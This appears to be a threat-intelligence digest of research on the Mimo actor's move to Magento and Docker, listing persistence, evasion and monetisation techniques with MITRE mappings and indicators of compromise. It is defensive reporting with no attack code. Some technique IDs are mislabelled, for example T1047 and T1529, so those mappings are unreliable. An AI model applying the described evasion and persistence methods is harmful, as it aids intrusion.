Threat Research

Beyond Mimo’lette: Tracking Mimo’s Expansion to Magento CMS and Docker

DataDogHQ
Beyond Mimo’lette: Tracking Mimo’s Expansion to Magento CMS and Docker

The Mimo threat actor has evolved from targeting Craft CMS to exploiting Magento ecommerce platforms via PHP-FPM vulnerabilities, employing advanced persistence and evasion techniques including the use of GSocket and memfd_create() syscall. Their operations now combine cryptomining and proxyjacking for dual monetization while also targeting Docker instances, demonstrating increasing sophistication and diversification. #Mimo #Magento #GSocket #memfd_create #IPRoyal

Keypoints

  • Mimo has shifted focus from Craft CMS to successfully compromising Magento ecommerce platforms through PHP-FPM command injection vulnerabilities.
  • The group employs sophisticated persistence mechanisms including the use of the GSocket tool for covert command and control with firewall/NAT bypass and encrypted communications.
  • Advanced evasion techniques involve memfd_create() syscall for in-memory execution of payloads, avoiding detection by not writing files to disk.
  • Mimo monetizes compromised systems using both cryptojacking via a UPX-packed XMRig miner and proxyjacking through the IPRoyal Pawns client, maximizing illicit revenue streams.
  • The threat actor targets Docker Engine APIs on misconfigured hosts to deploy malicious containers, expanding their attack surface beyond CMS platforms.
  • The malware uses Go-based modular binaries that include functionality for persistence, evasion, exploiting SSH for propagation, and payload execution.
  • Mimo employs operational security measures such as rotating C2 servers, masquerading processes as legitimate Linux kernel threads, and extensive credential-based lateral movement attempts including targeting AWS environments.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Used PHP-FPM command injection via a Magento CMS plugin to obtain initial access (“initial access vector is PHP-FPM command injection via a Magento CMS plugin”).
  • [T1071] Application Layer Protocol – Uses GSocket to establish encrypted command and control tunnels that bypass firewalls and NAT (“Connects through restrictive network configurations without port forwarding”).
  • [T1543] Create or Modify System Process – Persistence achieved through systemd service units, rc.local initialization, and crontab scheduled tasks (“Persistence is achieved via multiple techniques including SystemD service units, Legacy rc.local initialization, Scheduled tasks”).
  • [T1047] Windows Management Instrumentation or Unix Shell – Uses shell scripts and cron jobs with Base64-encoded commands to execute GSocket binaries and maintain remote access (“sample created a Base64-encoded string within a Crontab entry which decodes to a command that executes the GSocket binary”).
  • [T1055] Process Injection – Uses memfd_create() syscall for anonymous in-memory file execution of payloads to evade detection (“using the memfd_create() syscall to create an anonymous temporary file in memory that has an executable bit”).
  • [T1098] Account Manipulation – Extracts SSH public keys and uses multiple usernames to attempt lateral movement across hosts (“attempts to create an SSH connection using keys gathered… hard-coded usernames admin, ubuntu, dev, ec2-user”).
  • [T1499] Endpoint Denial of Service – Employs cryptojacking and proxyjacking for resource exploitation and monetization (“deploying a UPX-packed XMRig variant…, installs hezb.x86_64 – the IPRoyal Pawns client”).
  • [T1529] System Network Configuration Discovery – Detects own public IP and scans subnet for potential SSH targets (“determines its own public IP address… attempts to create SSH connections to random hosts within the local subnet”).
  • [T1036] Masquerading – Masquerades malicious processes with kernel thread-like names to evade detection (“process name designed to look like a legitimate or kernel-managed thread”).

Indicators of Compromise

  • [IP Address] Command and Control servers – 109.205.213.203 (initial C2), 193.32.162.10 (secondary C2), 15.188.246.198 (payload hosting server)
  • [Domain] GSocket infrastructure – g.gsocket.ninja, d.gsocket.ninja
  • [File Hash] GSocket configuration script – gsocket.sh, SHA256: 2171deb9293361fd801691948264ad8dc7864935140834449307d040a6d67787
  • [File Hash] Covert GSocket shell binary – gs-netcat_mini-linux-x86_64, SHA256: d94f75a70b5cabaf786ac57177ed841732e62bdcc9a29e06e5b41d9be567bcfa
  • [File Hash] Dropper script – 4l4md4r.sh, SHA256: bf2727a50a1c083fe478de1e51bded8a8eea6d6f1d02855161df8be42965f976
  • [File Hash] Docker variant ELF loader/stager – 4l4md4r, SHA256: ef108d6f7d9f2fe240a32f2cde594d3e54319237cedd21d13ab5e10ad4d05dbb
  • [File Hash] LD_PRELOAD rootkit – alamdar.so, SHA256: 7868cb82440632cc4fd7a451a351c137a39e1495c84172a17894daf1d108ee9a
  • [File Hash] Monero miner – xmrig-C3, SHA256: 4f509762ff7a65e56780f5b1fee10aaed267fe4b15182059480541fc7ce47923
  • [File Hash] Proxyware – hezb.x86_64, SHA256: 1aa4d88a38f5a27a60cfc6d6995f065da074ee340789ed00ddc29abc29ea671e

Read more: https://securitylabs.datadoghq.com/articles/beyond-mimolette-tracking-mimo-expansion-magento-cms-docker/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint